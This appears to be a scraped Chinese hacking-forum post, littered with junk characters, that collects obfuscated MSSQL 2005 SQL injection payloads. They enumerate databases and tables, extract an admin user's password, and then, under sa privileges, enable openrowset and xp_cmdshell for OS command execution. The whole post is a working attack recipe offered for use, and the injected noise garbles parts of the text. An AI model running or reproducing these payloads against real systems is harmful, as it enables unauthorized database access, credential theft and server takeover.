. W% }, i9 [7 f9 U- \0 w! P' T
$ m& o- U' A7 C/ |8 o: Z- o; @
9 R. g4 f9 R1 \! F' H[Copy to clipboard]CODE:( [4 N8 F* o. b/ [$ _
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
! e" [5 d4 o; h
5 T1 H2 n' H- c9 R+ B爆表语句,somedb部份是所要列的数据库,红色数字1累加
4 j Y& O S! T; M0 `& u$ M9 B/ ?0 M. S
0 p5 R6 O o% m, W3 f$ |* Y4 @8 e
[Copy to clipboard]CODE:" A; s8 U! t7 X* @: u% k4 F
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--0 `3 y% X3 g' \$ t, t% M
8 B& d' x: M: t9 K' D5 ]爆字段语句,爆表admin里user='icerover'的密码段
7 Y+ q$ y$ q/ o* q; T |) V" F& |! A0 l# ?% Y% B: a
; M' K( h* e* R1 C" N& L[Copy to clipboard]CODE:
0 w/ \( o# ^ @**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--5 [' i4 q# P! h
1 l+ G( D2 A4 S2 C+ [& d
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
4 c. ]1 [/ E4 ?7 c* q4 r8 o如果是sa权限,可以这样来开启
8 s7 Y" _$ W. p( R6 q开启openrowset u' W7 M$ z: m: L: n: `3 S3 C
: a( g7 P+ P( z0 z4 Z) Y" f
) s5 ?0 {3 k2 U: ?8 s6 A" M[Copy to clipboard]CODE:; @4 M6 [. H. V* O3 J
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
Q9 s6 m" P" P% U% T; _+ x/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
6 f; N' g( t/ N2 E6 y1 t% o$ [# p# a' T: _8 H* q. c' I
开启xp_cmdshell* \% P% x6 s& @9 c! v
2 @7 l9 ^, p( C
) X* G6 N+ \6 _, v% Z( L
[Copy to clipboard]CODE:
4 m" c, G- G; a. E* z" LEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--( J6 O* q) y: U
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--# p! @. b' I0 U
+ V1 W: f) x, {! b/ j: G2 ~8 v
ok,over~~晚安- }8 G/ k- U0 l' O5 P
|